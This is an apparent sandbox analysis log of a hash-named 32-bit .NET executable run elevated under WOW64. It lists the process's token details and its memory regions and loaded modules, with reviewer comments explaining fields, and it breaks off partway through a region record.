# Flog Txt Version 1
# Analyzer Version: 4.3.0
# Analyzer Build Date: Sep 20 2021 05:59:55
# Log Creation Date: 28.09.2021 11:40:59.571
# Process record for the executable under analysis (monitor_reason = "analysis_target").
Process:
id = "1"
# The image name is a 64-hex-character string followed by ".exe".
# NOTE(review): presumably the sample's SHA-256 used as its file name; verify
# against the hash fields of the analysis report before using it as an indicator.
image_name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
page_root = "0x45718000"
os_pid = "0xaf0"
# 0x3000 equals the Windows high mandatory integrity level RID
# (SECURITY_MANDATORY_HIGH_RID): the sample ran elevated in this analysis, so
# behaviour under a standard-user token may differ from what is logged here.
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x664"
cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe\" "
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
# 32-bit process; the region list shows both the SysWOW64 and System32 ntdll.dll
# plus wow64*.dll, i.e. it runs under WOW64 on a 64-bit guest.
bitness = "32"
# The token's groups include BUILTIN\Administrators, logged with [0xf] where most
# other groups show [0x7].
# NOTE(review): the bracketed values are presumably group attribute flags; confirm
# their meaning against the analyzer's format documentation.
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 118
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 119
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 120
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 121
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 122
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 123
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 124
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 125
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 126
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
# Mapping of the analysed executable at 0x400000. The range spans 0x188000 bytes
# (end_va - start_va + 1) and entry_point 0x583f8e (start_va + 0x183f8e) falls
# inside it. The same file is mapped again in region ids 310 and 352.
Region:
id = 127
start_va = 0x400000
end_va = 0x587fff
monitored = 1
entry_point = 0x583f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 128
start_va = 0x77260000
end_va = 0x773dafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 129
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 130
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 131
start_va = 0x7fff0000
end_va = 0x7ffc5f80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 132
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 133
start_va = 0x7ffc5f9d1000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffc5f9d1000"
filename = ""
Region:
id = 271
start_va = 0x660000
end_va = 0x66ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000660000"
filename = ""
Region:
id = 272
start_va = 0x62ee0000
end_va = 0x62f2ffff
monitored = 0
entry_point = 0x62ef8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 273
start_va = 0x62f30000
end_va = 0x62fa9fff
monitored = 0
entry_point = 0x62f43290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 274
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 275
start_va = 0x62fb0000
end_va = 0x62fb7fff
monitored = 0
entry_point = 0x62fb17c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 276
start_va = 0x670000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 277
start_va = 0x6cd30000
end_va = 0x6cd88fff
monitored = 1
entry_point = 0x6cd40780
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 278
start_va = 0x74530000
end_va = 0x7460ffff
monitored = 0
entry_point = 0x74543980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 279
start_va = 0x76c20000
end_va = 0x76d9dfff
monitored = 0
entry_point = 0x76cd1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 280
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 281
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 282
start_va = 0x590000
end_va = 0x64dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 283
start_va = 0x7c0000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 284
start_va = 0x73ee0000
end_va = 0x73f71fff
monitored = 0
entry_point = 0x73f20380
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 285
start_va = 0x7fb00000
end_va = 0x7fea0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sysmain.sdb"
filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")
Region:
id = 286
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 287
start_va = 0x76a90000
end_va = 0x76b0afff
monitored = 0
entry_point = 0x76aae970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 288
start_va = 0x74290000
end_va = 0x7434dfff
monitored = 0
entry_point = 0x742c5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 289
start_va = 0x670000
end_va = 0x6affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 290
start_va = 0x6c0000
end_va = 0x7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006c0000"
filename = ""
Region:
id = 291
start_va = 0x8b0000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 292
start_va = 0x74a40000
end_va = 0x74a83fff
monitored = 0
entry_point = 0x74a59d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 293
start_va = 0x75f60000
end_va = 0x7600cfff
monitored = 0
entry_point = 0x75f74f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 294
start_va = 0x73f90000
end_va = 0x73fadfff
monitored = 0
entry_point = 0x73f9b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 295
start_va = 0x73f80000
end_va = 0x73f89fff
monitored = 0
entry_point = 0x73f82a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 296
start_va = 0x75ef0000
end_va = 0x75f47fff
monitored = 0
entry_point = 0x75f325c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 297
start_va = 0x9b0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 298
start_va = 0x6c4f0000
end_va = 0x6c568fff
monitored = 1
entry_point = 0x6c4ff82a
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 299
start_va = 0x76f60000
end_va = 0x76fa4fff
monitored = 0
entry_point = 0x76f7de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 300
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 301
start_va = 0x76010000
end_va = 0x7615efff
monitored = 0
entry_point = 0x760c6820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 302
start_va = 0x76300000
end_va = 0x76446fff
monitored = 0
entry_point = 0x76311cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 303
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 304
start_va = 0xad0000
end_va = 0xc57fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 305
start_va = 0x77150000
end_va = 0x7717afff
monitored = 0
entry_point = 0x77155680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 306
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 307
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 308
start_va = 0xc60000
end_va = 0xde0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c60000"
filename = ""
Region:
id = 309
start_va = 0xdf0000
end_va = 0x21effff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000df0000"
filename = ""
# Second mapping of the sample file (the first is region id 127 at 0x400000).
# This view spans 0x183000 bytes, against 0x188000 for region 127, and the logged
# entry_point 0x2373f8e (start_va + 0x183f8e) lies just past end_va 0x2372fff.
# NOTE(review): presumably a flat file/data view rather than an executable image
# mapping, so entry_point is not a usable address inside this view; confirm
# against the mapping calls in the function log.
Region:
id = 310
start_va = 0x21f0000
end_va = 0x2372fff
monitored = 1
entry_point = 0x2373f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 311
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 312
start_va = 0x6cd20000
end_va = 0x6cd27fff
monitored = 0
entry_point = 0x6cd217b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 313
start_va = 0x21f0000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
# mscorwks.dll from Framework\v2.0.50727 is mapped into the sample's process with
# monitored = 1, i.e. the process hosts the .NET 2.0 runtime.
# NOTE(review): suggests the sample is a managed (.NET) executable; confirm via the
# PE's CLR header before choosing a static-analysis approach.
Region:
id = 314
start_va = 0x6bf40000
end_va = 0x6c4effff
monitored = 1
entry_point = 0x6bf8a848
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 315
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 316
start_va = 0x6bea0000
end_va = 0x6bf3afff
monitored = 0
entry_point = 0x6bea232b
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll")
Region:
id = 317
start_va = 0x21f0000
end_va = 0x230ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 318
start_va = 0x23d0000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 319
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 320
start_va = 0x650000
end_va = 0x650fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 321
start_va = 0x6b0000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 322
start_va = 0x7c0000
end_va = 0x7cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007c0000"
filename = ""
Region:
id = 323
start_va = 0x8a0000
end_va = 0x8affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 324
start_va = 0x7d0000
end_va = 0x7dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 325
start_va = 0x7e0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 326
start_va = 0x7f0000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 327
start_va = 0x800000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000800000"
filename = ""
Region:
id = 328
start_va = 0x810000
end_va = 0x84ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 329
start_va = 0x9b0000
end_va = 0xaaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009b0000"
filename = ""
Region:
id = 330
start_va = 0xac0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ac0000"
filename = ""
Region:
id = 331
start_va = 0x74a90000
end_va = 0x75e8efff
monitored = 0
entry_point = 0x74c4b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 332
start_va = 0x76fb0000
end_va = 0x76fe6fff
monitored = 0
entry_point = 0x76fb3b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 333
start_va = 0x764b0000
end_va = 0x769a8fff
monitored = 0
entry_point = 0x766b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 334
start_va = 0x77180000
end_va = 0x7720cfff
monitored = 0
entry_point = 0x771c9b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 335
start_va = 0x77210000
end_va = 0x77253fff
monitored = 0
entry_point = 0x77217410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 336
start_va = 0x75f50000
end_va = 0x75f5efff
monitored = 0
entry_point = 0x75f52e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 337
start_va = 0x850000
end_va = 0x850fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000850000"
filename = ""
Region:
id = 338
start_va = 0x23e0000
end_va = 0x2716fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 339
start_va = 0x860000
end_va = 0x86ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 340
start_va = 0x2720000
end_va = 0x471ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 341
start_va = 0x21f0000
end_va = 0x228ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 342
start_va = 0x2300000
end_va = 0x230ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 343
start_va = 0x860000
end_va = 0x89ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 344
start_va = 0x4720000
end_va = 0x481ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004720000"
filename = ""
Region:
id = 345
start_va = 0x6b3a0000
end_va = 0x6be99fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll")
Region:
id = 346
start_va = 0x76b10000
end_va = 0x76bfafff
monitored = 0
entry_point = 0x76b4d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 347
start_va = 0x2310000
end_va = 0x23a0fff
monitored = 0
entry_point = 0x2348cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 348
start_va = 0x70040000
end_va = 0x700b4fff
monitored = 0
entry_point = 0x70079a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 349
start_va = 0x2310000
end_va = 0x23cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 350
start_va = 0xab0000
end_va = 0xabffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ab0000"
filename = ""
Region:
id = 351
start_va = 0x2290000
end_va = 0x2292fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls")
Region:
id = 352
start_va = 0x4820000
end_va = 0x49a2fff
monitored = 1
entry_point = 0x49a3f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 353
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 354
start_va = 0x22a0000
end_va = 0x22dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 355
start_va = 0x4820000
end_va = 0x4cedfff
monitored = 0
entry_point = 0x4c9c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 356
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 357
start_va = 0x6abf0000
end_va = 0x6b392fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\2dcc35955cda7c1279cec70d8a3ac1c1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\2dcc35955cda7c1279cec70d8a3ac1c1\\system.ni.dll")
Region:
id = 358
start_va = 0x22e0000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022e0000"
filename = ""
Region:
id = 359
start_va = 0x22f0000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022f0000"
filename = ""
Region:
id = 360
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 361
start_va = 0x2310000
end_va = 0x23abfff
monitored = 0
entry_point = 0x239921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 362
start_va = 0x23c0000
end_va = 0x23cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 363
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 364
start_va = 0x6ab90000
end_va = 0x6abeafff
monitored = 1
entry_point = 0x6abd9010
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll")
Region:
id = 365
start_va = 0x23b0000
end_va = 0x23b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000023b0000"
filename = ""
Region:
id = 366
start_va = 0x4cf0000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cf0000"
filename = ""
# First record of the 64 KiB private range 0x4d00000-0x4d0ffff. The same range is
# logged again under ids 374, 376, 377, 380-385 and 387-405, and id 411 maps
# accessibility.dll at 0x4d00000.
# NOTE(review): repeated records of one range are consistent with the address
# being released and re-allocated; correlate with the allocation calls in the
# function log before concluding more.
Region:
id = 367
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 368
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 369
start_va = 0x4d10000
end_va = 0x4db5fff
monitored = 0
entry_point = 0x4d9e14e
